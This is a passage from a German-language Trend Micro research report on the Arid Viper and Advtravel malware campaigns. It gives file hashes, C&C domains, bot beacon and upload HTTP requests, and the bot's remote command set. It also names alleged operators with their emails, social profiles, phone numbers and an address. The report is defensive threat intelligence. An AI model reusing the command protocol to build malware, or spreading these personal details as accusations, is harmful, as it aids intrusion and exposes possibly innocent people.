Systemen aus nur einer
untergeordneten Kampagne
ƒƒ /del/: Verfügt über dasselbe Format wie der Ordner /apps/
und beinhaltet ebenfalls gestohlene Daten von Opfern,
insbesondere Bilder, Dokumente und Kennwörter.
10 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
ƒƒ /downs/: Beinhaltet verschiedene Tools wie die im Ordner /apps/
(siehe folgende Tabelle).
Dateiname
MD5-Hash
Zweck
Mkhaled.txt
b2690a9ac508cfe49f9db76695e18f00
Umfasst den Text https://www.
facebook.com/messages/
LODALODALODA, der eine
Facebook-Nachricht an Mohamed
Khaled (https://www.facebook.com/
LODALODALODA) sendet
aa.bat
1e63925edff6ea3449b7d3468443a52f
Kopiert pat2.exe und patver.tmp aus
dem Order \appdata\roaming\explr\
appnew.exe
ef5a37a6dcb1c417f4324730ce56be48
Backdoor, die auf den C&C-Server
devhelx.no-ip.org zugreift
appsrv.exe
2da94e47a68d9a137504106a513a3559
Backdoor, die auf den C&C-Server
devhelx.no-ip.org zugreift
estad.scr
d6951e596910ec6105512ed002f24aa1
Lädt pat2.exe hinunter
ez.exe
293d37cf8c62076de739f4bd68e685bb
Backdoor, die auf den C&C-Server
devhelx.no-ip.org zugreift
kms.rar
6fa049b83def6c41154558c706b6605d
Hacking-Tool in Form einer
kennwortgeschützten Archivdatei
log.exe
ccaac14d265915f4fdc6229ec6c9e854
Legt die Protokolldatei WinKey.‌log
ab, in der Tastatureingaben proto­
kolliert werden
out.rar
c69bb266bede466825f21d900453f45e
.ZIP-Datei einschließlich der
Datei pswd2.exe (erkannt als
TROJ_STRPADT.A)
pswd2.exe
0472d67eadb9aaa0491398bd14f6229f
Legt .TXT-Datei ab, die URLs,
Benutzernamen und Kennwörter
beinhaltet
pswd4.exe
d8209defc3966076737401d0a22d27d3
Legt .TXT-Datei ab, die URLs,
Benutzernamen und Kennwörter
beinhaltet
start.exe
0ae436d95cc1eb6a9b57df984734973e
Lädt pat2.exe hinunter
svrg.exe
c8d387bb135d9acef3dfcf56464078fb
Ändert AutoAusführen-Einträge in
der Registrierung
11 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Dateiname
MD5-Hash
Zweck
usbf2.exe
d57e0f5f0320f1b3fd8ae81a370170d0
Wird als TROJ_STRPADT.A erkannt
und lädt pat2.exe herunter
usbf4.exe
e36680a19601f84af6d311e1fb847eef
Wird als TROJ_STRPADT.A erkannt
und lädt pat2.exe herunter
vvb.exe
2a38ff709549b97b4e42b6fae81c6177
Ändert AutoAusführen-Einträge in
der Registrierung
vvb.sfx.exe
f747d5f998e48279cad7e9ed46e86a6b
Legt die Datei VVB.exe ab
ƒƒ /pat/: Beinhaltet zwei Dateien (siehe folgende Tabelle).
Dateiname
pat2.exe
MD5-Hash
Zweck
7171feeedd345a7d50091e76fc7e3ac4
SFX-Archiv, das micro.exe installiert
aa55cb19c3a61c0177e75198c70d6fa3
Erstes Exemplar ist eine normale
Datei, während das zweite als
TROJ_STRPADT.A erkannt wird
pat4.exe
dcd2314f1af5dd1fd3e317bdf32faabb
ƒƒ /patlogs/: Jede vom C&C-Server ausgeführte Aktion wird hier in einer Reihe
detaillierter Protokolldateien aufgezeichnet. Jede Protokolldatei verwendet
das Format Log_A[3 letters]X_[COMPUTERNAME_USERNAME]_m-dd-yyyyhh‑mm‑ss.log.
Protokollabschnitt mit Daten von Opfern, die
von einem Angreifer gestohlen wurden, der als
admin@‌dhs angemeldet war
12 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
ƒƒ /rpts/: Beinhaltet verschiedene leere Unterverzeichnisse und zwei Dateien
(siehe folgende Tabelle).
Dateiname
MD5-Hash
Zweck
pat.exe
2e5da32b07c531a6508b77f624bbeb22
Dieselbe Datei wie start.exe
app11.exe
342f79337765760ad4e392eb67d5ed2c
MSI-Installer für dotnet2
ƒƒ /tools/: Beinhaltet einige .PHP-Dateien, zwei .EXE-Dateien und eine TXTDatei (siehe folgende Tabelle).
Dateiname
MD5-Hash
Zweck
dotnet2.exe
c64fd1f972822ed84378c7058fea0744
Rechtmäßiger .NET-Installer
wininstl.exe
342f79337765760ad4e392eb67d5ed2c
Dieselbe Datei wie app11.exe
ƒƒ LastIps.txt: Umfangreiche Liste mit IP-Adressen in Verbindung mit Personen,
die auf die Seite advtravel.info/tools/ip.php zugreifen. Geolokationsdaten
lassen erkennen, dass diese Personen weltweit verteilt waren. Die letzte
Anmeldung des Angreifers auf dem Server kann dank Geolokalisation auf
Gaza in Palästina zurückverfolgt werden.
Die Domain advtravel.info wurde 2013 auf datengeschützte Whois-Server verschoben.
Von 2007 bis 2012 war die Domain jedoch folgendermaßen registriert:
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Name:Adv Travels
Organization:Adv Travels
Street1:4401 Bayou Boulevard
Street2:
Street3:
City:Pensacola
State/Province:Florida
Postal Code:32503
Country:US
Phone:+01804777777
Phone Ext.:
FAX:
FAX Ext.:
Email:[email protected]
Malware
Eine Analyse der gestohlenen Dateien und Protokolle ermöglichte es uns, eine kurze
Beschreibung der ursprünglichen Advtravel-Malware zu erstellen. Im Wesentlichen
dient die Malware lediglich dazu, einem C&C-Server zu antworten. Die Angreifer luden
dann manuell andere Tools auf infizierte Systeme, um Anmeldedaten von Opfern zu
entwenden.
Nachdem die ersten Dateiablagen oder Downloads abgeschlossen sind, startet die
Malware die datenstehlende Routine. Sie ruft den C&C-Server zurück und meldet jeden
13 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
auf dem System gefundenen Ordner. Der Server antwortet, indem er
der Malware mitteilt, ob die Inhalte der Ordner gesendet werden sollen
oder nicht.
Die Malware von Advtravel und die von Operation Arid Viper zeigten ein
ähnliches Verhalten. Dies mag möglicherweise ein Zufall sein, da die
Binärdateien sich deutlich voneinander unterschieden. Die AdvtravelMalware wurde in C# programmiert, sodass die Dropper-Datei
zusätzliche Schritte durchlaufen muss, um eine .NET-ausführende
Umgebung dort zu erstellen und zu aktualisieren, wo dies möglich
ist. Hierzu sind Downloads und Microsoft™ Softwareinstallationen
erforderlich. Dies verzögerte nicht nur die Infektion bedeutend,
sondern brachte auch zusätzliche potenzielle Fehlerquellen mit sich.
Im Folgenden sind einige HTTP-Anforderungen aufgeführt, die in
Verbindung mit der Operation Advtravel entdeckt wurden:
•
GET/sys/who.php?t=2/8/2015%205:30:59%20AM HTTP/1.1:
Erste Anmeldung.
•
GET/sys/genid.php?t=2/8/2015%205:31:00%20AM:
Fordert eine eindeutige ID für einen bestimmten erstmaligen
Client an. Die in diesem Beispiel zurückgegebene ID war
2aMUu7TcPbUBsHVLNogB.vic. Der Bot-Client wird diese ID
durchgängig verwenden.
•
POST/sys/upload.php?dirname=//2aMUu7TcPbUBsHVLNogB.vic&x=old:
Informationen über Verzeichnisnamen senden.
•
GET/sys/data//2aMUu7TcPbUBsHVLNogB.vic/command.cmd?t=
2/8/2015%205:31:02%20AM: Befehl vom Server erhalten.
Mögliche Infektionskette
der Advtravel-Malware
In einem bestimmten Beispiel war die erste Malware eine selbstextrahierende
.CAB-Datei, die anschließend die Haupt-Malware und die Datei patver.tmp mit
dem Wert A012X herunterlud. Der Wert gibt den Serverordner an, in den die
gestohlenen Daten hochgeladen werden sollen. Dies ist im Wesentlichen eine
eindeutige Kampagnenkennung. Dann legte die Malware eine .JPG-Datei ab, die
den Felsendom in Jerusalem zeigt. Zudem zeigten sich folgende Verhaltensweisen:
•
Installiert sich automatisch in einem Standardordner wie C:\Users\[USER]\
AppData\Roaming\AdobeAPP oder C:\Documents and Settings\[USER]\
Application Data\explr
•
Speichert Protokolle und Support-Dateien unter C:\Users\[USER]\AppData\
Roaming\AdobeAPP\temp (Beachten Sie, dass die .EXE-Datei variiert und
anscheinend bei Bedarf heruntergeladen wird.)
•
Nutzt viele der bereits in einem anderen Abschnitt beschriebenen SupportDateien, die sich im Ordner \temp befinden
•
Kann zum Beispiel folgende Befehle an Bots senden:
ƒƒ get_scrshot: Screenshot anfordern.
ƒƒ get_workdata: Gibt die lokale Zeit, das Betriebssystem, den Benutzer­
domainnamen,, den Benutzernamen und den Malware-Pfad eines
infizierten Systems zurück.
ƒƒ explore_dir*[FULL PATH TO DIR]: Erstellt eine Verzeichnisliste.
ƒƒ run_file*[FILE TO RUN]: Führt eine Datei aus.
14 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
ƒƒ get_file*[FILE TO GET]: Ruft die
Datei vom System eines Opfers ab.
ƒƒ get_procslist: Ruft eine Prozessoder Taskliste ab.
ƒƒ kill_prcs*[PID]: Bricht einen
Prozess ab.
ƒƒ get_driveslist: Erstellt eine Liste
sämtlicher montierter Laufwerke
eines infizierten Systems.
ƒƒ =FILE=: Ermöglicht es Angreifern,
neue Dateien auf das System des
Opfers hochzuladen.
ƒƒ download*[URL]: Lädt eine Datei
von einer URL auf ein infiziertes
System herunter.
ƒƒ Löscht eine Datei oder einen Ordner.
•
Kommuniziert mit dem Verzeichnis
advtravel.info/apps/, um auf Befehle zu
warten, und lädt gestohlene Dateien
in das Verzeichnis /del. Das Protokoll
gibt das aktuelle Verzeichnis eines
infizierten Systems an, führt ein
Kennwortdiebstahl-Programm aus,
fragt gestohlene Anmeldeinformationen
ab und erfasst Screenshots.
Basierend auf patlogs melden sich mindestens
vier Botnet-Administratoren – khloda@dhs,
belal@dhs, belal2@dhs und admin@dhs –
am Server an und kontrollieren die Bots über
den Administrationsbildschirm, ein Tool mit
der Bezeichnung DHDSM.
Protokoll der Aktivitäten, die eine Variante der
Advtravel-Malware auf infizierten Systemen ausführt
Opfer
Der Advtravel-Server verfügt über Daten von mehr als 500 infizierten Systemen.
Alle gestohlenen Details, die auf dem Server gefunden wurden, wurden zu Beweis­
zwecken gesichert. Die meisten Daten wurden analysiert, um eine Vorstellung davon
zu erhalten, welche Opfer von der Kampagne betroffen sind. Im Folgenden sind
einige Beobachtungen aufgeführt:
•
Bei der Mehrheit der Opfer scheint es sich um Araber aus Ägypten zu
handeln.
•
Alle infizierten Systeme waren anscheinend private Laptops, was sich aus
der Akkuanzeige auf Screenshots schließen lässt. Dies führte uns zu der
Annahme, dass die Kampagne technisch weniger raffiniert oder gezielt war
als die Operation Arid Viper.
15 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
•
Die Angreifer scheinen ein ausgesprochen hohes Interesse an Bildern zu
haben, die auf den Systemen der Opfer gespeichert sind. Dies könnte ein
Zeichen dafür sein, dass sie nach belastenden oder kompromittierenden
Bildern suchen, die sie zu Erpressungszwecken nutzen können. Die Angreifer
sind daher möglicherweise weniger erfahrene Hacker, deren Motive weder
finanzielle Gewinne noch Spionage sind.
•
Ungewöhnlich viele Screenshots zeigten geöffnete Facebook-Profile.
Die Opfer verbrachten entweder täglich sehr viel Zeit auf Facebook oder
die Malware erfasste jedes Mal einen Screenshot, wenn ein Opfer auf die
Website zugriff. Hierdurch konnten die Angreifer ihre Opfer identifizieren.
Mehr Informationen hierzu werden nach weiteren Untersuchungen
veröffentlicht.
fpupdate.info Server
Das Hauptverzeichnis des Servers fpupdate.info enthält einen Ordner
/mobile/. Zum Zeitpunkt der Erstellung dieses Berichts ließ die Web­
site keinen öffentlichen Zugriff auf die Dateien des Servers zu. Im
September 2014 war es uns jedoch noch möglich, ein entsprechendes
Backup zu erstellen.
Derzeit kann keine der verbundenen .PHP-Dateien auf die BackendDatenbank des Servers zugreifen. Der Server ist daher möglicherweise
heruntergefahren oder wird nicht mehr gewartet. Ein Upload-Ordner
verfügte über zwei Unterordner mit persönlichen Daten, die von Mobil­
telefonen von Opfern gestohlen worden waren. Jeder Unterordner
enthielt zwei weitere Unterordner: /calllog und /sms. Es war uns jedoch
nicht möglich, eine Kopie der Android™-Malware zu erhalten, mit der die
Angreifer möglicherweise die Protokolle erstellt haben.
fpupdate.info
Hauptverzeichnis
OPFER
Der Server fpupdate.info beinhaltete gestohlene Telefondaten von
folgenden zwei Opfern:
Daten von Opfern,
gespeichert auf fpupdate.info
•
LGE_IMEI: Die International Mobile Station Equipment Identity (IMEI)Nummer zeigte, dass es sich um das Telefonmodell LG D821 Nexus 5
handelte. Eigentümer war eine Person aus Israel. Auf dem Server wurden
Anrufprotokolle gefunden, die verschiedene israelische Telefonnummern
enthielten, denen teilweise Kontaktnamen zugewiesen waren. Ein bestimmter
Kontakt mit der Bezeichnung Meine Nummer gehörte zu einer Person aus
Palästina.
•
SAMSUNG_IMEI: Die IMEI-Nummer dieses Geräts zeigte, dass es sich
um das Modell Samsung P5100 Galaxy Tab 2 10.1 handelte. Eigentümer
war eine Person aus Israel. Gefundene Anrufprotokolle belegten, dass
verschiedene israelische Telefonnummern angerufen wurden. Zudem wurden
SMS-Protokolle gefunden. Die meisten Textnachrichten waren Tweets von
@‌shadipal2 und @‌Alaqsavoice_Brk – Benutzer, die Echtzeitnachrichten über
Gaza veröffentlichten. In den anderen Textnachrichten ging es um Treffen an
Orten in Tunesien wie Gafsa und Skiet Eddaier.
16 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
LINKSIS.INFO SERVER
Zusätzlich zu den zwei bereits erwähnten Servern zeigt auch linksis.info eine sehr
ähnliche offene Verzeichnisstruktur wie advtravel.info. Der Server nutzte außerdem
zum großen Teil dieselbe Malware. Wir haben diesen Server nicht vollständig
untersucht. Ein kurzer Blick zeigte jedoch eindeutig Verbindungen zu advtravel.info.
Beispiele:
•
Der Server wird auf derselben IP-Adresse 188.40.106.84 mit Standort
in Hetzner, Deutschland, gehostet.
•
Der DNS SOA-Datensatz nutzte die E-Mail-Adresse
mahmoud.‌hashem12@‌gmail.com.
•
Der Server verfügt über den Ordner http://www.linksis.info/sys/del/belal/,
dessen Eigentümer einer der Benutzer der C&C-Systemsteuerungen von
advtravel.info ist.
•
Der Server beinhaltet dieselben Protokolldateien wie webbrowser.txt usw. –
diese waren jedoch verschlüsselt.
ZUORDNUNGSHINWEISE
Die Personen, die in diesem Abschnitt identifiziert werden, stehen offensichtlich in
Verbindung mit Operation Arid Viper oder Advtravel. Trend Micro weist jedoch darauf
hin, dass dies nicht beweist, dass die Personen an cyberkriminellen Aktivitäten
beteiligt sind oder nicht. Wie möchten hier lediglich verifizierte Fakten darlegen, die
diese Personen mit der Infrastruktur und Malware dieser Kampagnen in Verbindung
bringen. Es gibt verschiedene andere Gründe, z. B. der Diebstahl ihrer E-Mail-Konten
und deren Nutzung zur Registrierung von C&C-Servern, vorsätzlicher Identitätsbetrug
oder ähnliche Umstände, die ebenfalls eine Erklärung für ihre Verbindungen zu den
Kampagnen liefern könnten.
Khalid Samra
Einige der C&C-Domainnamen
wurden durch eine Person mit
dem vermeintlichen Namen
Khalid Samra aus Palästina
registriert. Die E-Mail-Adressen
seiner sozialen Netzwerke
wurden genutzt, um verschiedene
C&C-Server von Operation
Arid Viper basierend auf
Whois-Registrierungsdaten
zu registrieren.
Eine E-Mail-Adresse, die den
Namen von Samra beinhaltete –
[email protected] –
wurde verwendet, um den C&CServer pstcmedia.com basierend
auf DNS SOA-Datensätzen zu
17 | Seite
Das Profil von Khalid Samra erwähnt auch, dass er in
Palästina ansässig ist.
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Die zwei Facebook-Konten von Samra mit übereinstimmenden Profilen und Bildern
Zwei Facebook-Seiten, mit denen Samra in Verbindung steht
registrieren. Weitere OSINT-Untersuchungen deckten Verbindungen zu anderen
ähnlichen E-Mail-Adressen auf: [email protected], khalid.samraa@
hotmail.‌com, [email protected] und [email protected].
Um mehr über die Person Samra zu erfahren und herauszufinden, ob er ein Motiv
für eine Teilnahme an den Kampagnen habe könnte, schauten wir uns seine Konten
in anderen sozialen Netzwerken an. Offensichtlich verfügt er über zwei FacebookKonten: https://www.facebook.com/khaled.a.samraa und https://www.facebook.com/
khalid.k.abusamra. Die E-Mail-Adresse des ersten Kontos wurde verwendet, um
einen der C&C-Server der Operation Arid Viper zu registrieren. Nach den öffentlich
sichtbaren Bildern zu urteilen war er der Eigentümer aller drei Konten. Die Konten
zeigen, dass er in Gaza lebt und pro-palästinensische und anti-israelische politische
Überzeugungen vertritt.
18 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Auch das zweite scheinbare Facebook-Konto von Samra lässt erkennen,
dass er aus Gaza kommt. Hier wird außerdem das Unternehmen erwähnt,
in dem er arbeitete: Coreions. Dies entspricht den Angaben seines
LinkedIn-Profils. Im Gegensatz zum ersten Konto verfügt dieses jedoch
über mehrere Verbindungen zu verschiedenen Familienmitgliedern.
Darüber hinaus belegen veröffentlichte Fotos deutlich, dass er im Jahr
2012 in Gaza war. Eine weitere Facebook-Suche nach der E-MailAdresse [email protected] verwies außerdem auf eine Gruppen­
seite mit der Bezeichnung „GazaUnderFire2012“ (https://www.facebook.
com/GazaUnderFire2014). Sie wurde offenbar von Samra im Jahr 2012
eingerichtet. Diese Seite führte dann zu der neueren Gruppenseite „Gaza
Under Attack 2014“ (https://www.facebook.com/gazaunderattack2014).
Beide Seiten stellen Neuigkeiten zum derzeitigen Konflikt zwischen
Palästina und Israel bereit, wobei eine stark pro-palästinensische
(Pro‑Hamas) und anti-israelische Haltung vertreten wird – ganz wie
bei den privaten Facebook-Konten von Samra.
Neben den Facebook-Konten verfügte Samra über Konten in weiteren
sozialen Netzwerken wie Twitter (https://twitter.com/KhalidSamraa),
Google+ (https://plus.google.com/113430785728528060894/ und
https://‌plus.google.com/117379342774799926526/) sowie MySpace
(http://myspace.com/225923317).
Am 4. November 2011 wurde der Whois-Datensatz von Coreions
erneut geändert. Obwohl alle wesentlichen Daten gleich blieben,
wurde die E-Mail-Adresse zu [email protected] geändert.
Am 13. Januar 2012 wurden die gesamten Registrierungsdaten
folgendermaßen geändert:
khalid abu samra ()
Gaza- Al Rimal- Al Wihda Street, Opposite to
Al-Amal institu
Al-Nakheel commercial mall, 1st floor
Gaza, ISRAEL 00972
IL
Ahmed Jmal
Die E-Mail-Adresse [email protected] wurde verwendet, um
zwei C&C-Server der Operation Arid Viper zu registrieren: mixedwork.
com und plmedgroup.com. Es gibt auch Verbindungen zum FacebookKonto https://www.facebook.com/ahmed.jmal.00. Im Facebook-Konto
von Ahmed Jmal ist als Wohnsitz Marrakesh in Marokko angegeben.
Mahmoud Hashem
Die E-Mail-Adresse [email protected] wurde verwendet,
um die zwei C&C-Server mediahitech.info und ahmedfaiez.‌info der
Operation Arid Viper zu registrieren. Darüber hinaus wurde über diese
E-Mail-Adresse eine der C&C-Domains von Advtravel registriert:
fpupdate.‌info. Ahmedfaiez.com und fpupdate.info haben ebenfalls
Verbindungen zur E-Mail-Adresse [email protected]. Diese Tatsache
belegt, dass es eine Beziehung zwischen den zwei Kampagnen gibt,
19 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
obwohl sie separate Binär­dateien
nutzten. Es gab einige Gemein­
sam­keiten wie zum Beispiel die
Nutzung einer gemeinsamen
Netzwerk­infrastruktur.
[email protected] wurde
außerdem verwendet, um sechs
der mit beiden Kampagnen
verbundenen C&C-Server zu
registrieren: ahmedfaiez.info,
fpupdate.info, ineltdriver.com,
flushupdate.com, flushupate.
com und advtravel.info. Die
E-Mail-Adresse wurde außerdem
in DNS SOA-Datensätzen für
linkedim.‌in, iwork-sys.com,
nauss‑lab.‌com, nice-mobiles.com
und abuhmaid.‌net gefunden.
Die Website linkedim.in war unter
Verwendung folgender Daten
registriert:
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Registrant
Die E-Mail-Adresse von Ahmed Jmal wurde verwendet, um
zwei C&C-Server der Operation Arid Viper zu registrieren.
Name:Mahmoud Hashem
Organization:blogging hoster
Street1:omar mokhtar
City:gaza
State/Province:gaza strip
Postal Code:00972
Country:IL
Phone:+972546587385
Email:[email protected]
Die oben stehenden Registrierungsdaten schaffen eine Verbindung zwischen den
zwei E-Mail-Adressen [email protected] und [email protected].
Wir glauben, dass beide zu ein und derselben Person gehören. Bisher konnten wir
jedoch aus diesen Profilen noch keine reale Person ermitteln.
Dev_hima
Wie bereits erwähnt, können verschiedene Infektionsprotokolle von advtravel.‌info
eindeutig mit den Malware-Entwicklern oder Bot-Mastern der Operation Advtravel
in Verbindung gebracht werden. Darüber hinaus ist zu beachten, dass sich die in
Operation Advtravel und die in Operation Arid Viper verwendete Malware deutlich
voneinander unterschied, obwohl eine gemeinsame Netzwerkinfrastruktur genutzt
wurde. Die Protokolle belegten, dass die Infektion aus demselben Ordner gestartet
wurde, in dem Visual Studio® eine kompilierte Datei ablegte. Screenshots zeigten
außerdem, dass weitere Malware auf advtravel.info vorhanden war. advtravel.info
ist demnach eine Entwicklungsumgebung. Mit hoher Wahrscheinlichkeit könnte es
sich dabei um die Umgebung handeln, in der die Malware programmiert wurde.
Der Benutzername des Servers lautet Dev_hima. Bei einer näheren Untersuchung
weiterer Protokolldateien konnten wir mindestens drei weitere Systeme mit
demselben Benutzer ausfindig machen. Einige Beispiele aus der Trend Micro
Exemplar­datenbank nannten Dev_hima ebenfalls als internen Autor.
20 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Die Bot-Protokolle von Dev_
hima sehen aus wie Protokolle
aus Testumgebungen mit
ver­schiedenen virtuellen
Maschinen. Diese gehörten
dem ursprünglichen Entwickler,
der einige Aktionen zur Fehler­
behebung und zum Testen durch­
führte. Dieser Fehler setzte sich
jedoch noch weiter fort, denn
während der Malware-Tests
wurden Screenshots des Systems
von Dev_hima erfasst. Hierdurch
gelang es uns, einen Einblick in
seine Tätigkeiten zu gewinnen.
Die CPanel-Anzeige in einer
Windows 8-Umgebung zeigte,
wie er durch Opfer-Protokolle
navigierte. Andere im selben
Browser geöffnete Registerkarten
zeigen seine Facebook-Profil­
seite an.
Auf advtravel.info gespeicherter Screenshot vom System von
Dev_hima
Bei der Systemsteuerung handelt
es sich um ein Windows-Tool mit
der Bezeichnung „DHSDM“. Das
entsprechende Programmsymbol
ist auch ganz rechts auf der
Taskleiste zu sehen. Dies ist
auf verschiedenen anderen
virtuellen Testmaschinen von
Dev_hima zu finden. Es wurde
außerdem ersichtlich, dass
Dev_‌hima der Admin-Benutzer
der Systemsteuerung war. Andere
Details aus Protokollen deckten
eine IP-Adresse mit Geoposition
Kairo, Ägypten, auf.
Informationen zu einer Malware-Variante, die von Dev_hima
herausgegeben wurde
Ein weiterer Hinweis auf eine
Verbindung von Dev_hima
zur Advtravel-Malware war
ein funktionsfähiger Downloader aus dem Dezember 2014, der in Beziehung zu
advtravel.info steht. Das Programm lud eine Malware von einem Server herunter, die
dann auf infizierten Systemen ausgeführt wurde. Im PE-Header dieses Downloaders
war ebenfalls der Name Dev_hima zu finden – diesmal als Herausgeber der
Anwendung. Nveron scheint der Dateiname zu sein, den Dev_hima für die Malware
gewählt hat.
Eine Websuche nach Entwicklern mit dem Nicknamen Dev_hima ergab ein Profil,
das mit unseren bisherigen Erkenntnissen weitgehend übereinstimmt. Dev_hima
war im Internet äußerst präsent. Er verfügte über verschiedene Onlinekonten wie
http://‌devhima.blogspot.com/p/blog-page.html, http://devhima.webs.‌com/‌about,
youtube.com/user/ibrahhm2121/, facebook.com/devhima, twitter.com/dev_‌hima,
linkedin.com/pub/ebrahim-elsharawy/69/324/7b5, scribd.com/devhima,
21 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
soundcloud.‌com/ebrahimelsharawy und devhima.tumblr.
com, die seine reale Identität mit
seinem Nicknamen verbinden.
Dev_hima steht auch mit der
Skype-ID ibrahhm2121 sowie
den E-Mail-Adressen dev_hima@
yahoo.com, devhima@hotmail.
com, [email protected],
[email protected] und
[email protected] im
Zusammenhang. Natürlich ist
es denkbar, dass ein bösartiger
Hacker sich die Identität von
El Shrawy aneignete oder zufällig
diesen Nicknamen auswählte.
Einige der Profile von Dev_hima in sozialen Netzwerken
Ein näherer Blick auf bösartige
Aktivitäten, die mit dem Nick­
namen Dev_hima in Zusam­men­
hang stehen, brachte äußerst
interessante Erkenntnisse. Wir
fanden heraus, dass Dev_hima
ein Mitglied des „Gaza Hacker
Teams“ war – eine Gruppe,
die in der Vergangenheit in
zahlreiche Vorfälle von WebsiteHacking- und -Verunstaltung von
israelischen Zielen verwickelt
war. Einige der über 2000 von
diesem Team ausgeführten
Verunstaltungsangriffe betrafen
Websites aus Israel.
Dev_hima verfügt auch über Verbindungen zu verschiedenen
Diverse Hacker-Gruppenprofile
E-Mail-Adressen und Onlinekonten
von Dev_hima können auch
auf gaza-hacker.org/cc/
member-u_42271.html und arabteam2000-forum.com/index.php/user/272853-devhima/ gefunden werden. Seine persönliche Projektseite http://devhima.webs.‌com/
zeigt verschiedene bösartige Tools, die von ihm programmiert wurden. Mithilfe von
DevPcTwitter können Angreifer zum Beispiel ein Zielsystem über ein Twitter-Konto
steuern. DevSpy dagegen ermöglicht es Eltern, zum Schutz ihrer Kinder deren
Onlinekommunikation und Surfgewohnheiten zu überwachen. Tatsächlich handelt
es sich bei DevSpy jedoch um eine Spyware.
DevPcTwitter (MD5: bfcb492d282960152a366b5760b87920d02c6e83) steht
öffentlich zum Download auf der Website von Dev_hima bereit.
Interessant ist die Struktur der letzten vier DevPcTwitter-Befehle: getfile*[file_path].
Die Befehle hatten eine ähnliche, jedoch nicht vollkommen identische Syntax wie
das Format, das der Bot von Dev_hima zur Kommunikation mit advtravel.info nutzte.
Dev_hima veröffentlichte Video-Tutorials auf YouTube zur Konfiguration und Ver­
wendung von DevPcTwitter. Diese Videos waren mit seiner persönlichen Website
verknüpft. Die Funktion des Twitter-Bots ist einfach. Ein Benutzer kann ein
Twitter-Konto und eine E-Mail-Adresse im DevPCTwitter-Programm registrieren.
22 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Liste mit Website-Angriffen, in die die Hacker-Gruppe von Dev_hima verwickelt war
Dann kann der Benutzer Befehle
über das registrierte Konto
tweeten, die vom Bot gelesen
und ausgeführt werden. Befehle
wie GetScreenShot fordern
DevPcTwitter auf, Screenshots
vom Desktop eines Opfers zu
machen und diese dann an die
registrierte E-Mail-Adresse zu
senden. Mithilfe des Befehls
Download$[URL] kann der Bot
außerdem Dateien herunterladen
und ausführen.
Oberfläche von DevPcTwitter zeigt, dass das Tool für arabisch
sprechende Anwender entwickelt wurde.
DevPcTwitter ist als risikoarmes Tool einzuschätzen, da es bei der Einrichtung und
Ausführung sehr viel Benutzerinteraktion erfordert. Der dazugehörige Bot kann nicht
verborgen im Hintergrund ausgeführt werden.
Dev_hima entwickelte außerdem das Spionage-Tool DevSpy. Der entsprechende
Installer (MD5: d325c541fa0f3080a25394fe3a586100910f5569) steht ebenfalls
zum öffentlichen Download über http://devhima.webs.com/ bereit. Im Gegensatz zu
DevPcTwitter verfügt DevSpy nicht über eine arabische, sondern über eine englische
23 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Tools, die zum öffentlichen Download auf der Website von Dev_hima bereitstehen
Oberfläche. Auch die Einrichtung des Tools
ist recht selbsterklärend. Es erfasst DesktopScreenshots in benutzerdefinierten Intervallen
und speichert diese dann in einem Ordner.
DevSpy kann verborgen im Hintergrund aus­
geführt werden. Bei Ausführung im Tarnmodus
kann der Zugriff auf das Tool jedoch nur durch
eine Tastenkombination erfolgen, für die eine
Kennwortauthentifizierung erforderlich ist. In
diesem Modus kann DevSpy sich außerdem
selbst aus der Prozessliste im Windows TaskManager eines infizierten Systems entfernen.
DevSpy stellt ein mittleres bis hohes Risiko dar,
denn das Tool wurde speziell entwickelt, um
Benutzer im Tarnmodus auszuspionieren. Es
ist möglich oder sogar wahrscheinlich, dass die
zur Kommunikation mit advtravel.info genutzte
Malware eine privat erweiterte Version des Tools
von Dev_hima ist.
VIRUS_HIMA
Dev_hima nutzte die Handles hima, virusxhima
und ViRuS_HiMa mit der E-Mail-Adresse
[email protected]. Es gab jedoch keine
ausreichenden Beweise, um zu belegen, dass es
sich bei Dev_hima und ViRuS_HiMa um ein und
dieselbe Person handelte.
ViRuS_HiMa stand in Verbindung mit
verschiedenen bekannten Hacking-Angriffen.
Beispiele:
•
24 | Seite
Der Diebstahl von 150.000 Kennwörtern
von Mitarbeitern, Kunden und Partnern
von Adobe wie das US-Militär, USAF,
Google, NASA und DHL [5]
DevPcTwitter unterstützt zahlreiche ausführbare
Befehle
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
•
Der Cross-Site-Scripting
(XSS)-Angriff auf
2shared.com [6]
•
Über 1.700 Vorfälle von
Websiteverunstaltungen
•
Zu dem SQL-Angriff auf
Yahoo! bekannten sich
Täter aus Ägypten [7]
Einige E-Mail-Adressen mit
Verbindungen zu ViRuS_HiMa
sind u. a. virusxhima@gmail.
com, egypt_government@
hotmail.com, [email protected]
und [email protected].
Oberfläche und Setup-Konsole von DevSpy
Mohammed Khaled
Wie bereits erwähnt verfügte die advtravel.info-Datei Mkhaled.txt über
den Link https://www.facebook.com/messages/LODALODALODA.
Beim Klicken auf diesen Link wurde eine Facebook-Nachricht
an die Profilseite von Mohamed (https://www.facebook.com/
LODALODALODA) gesendet, um diesen über die neue erfolgreiche
Infektion eines Systems zu unterrichten. Das Profil zeigt, dass Khaled
in Kairo, Ägypten, lebt.
Interessanterweise kann eine Person namens Mohamed Khaled des
Weiteren mit Dev_hima in Verbindung gebracht werden. Auf einer
Seite, auf der das Tool DevPcTwitter von Dev_hima angeboten wird,
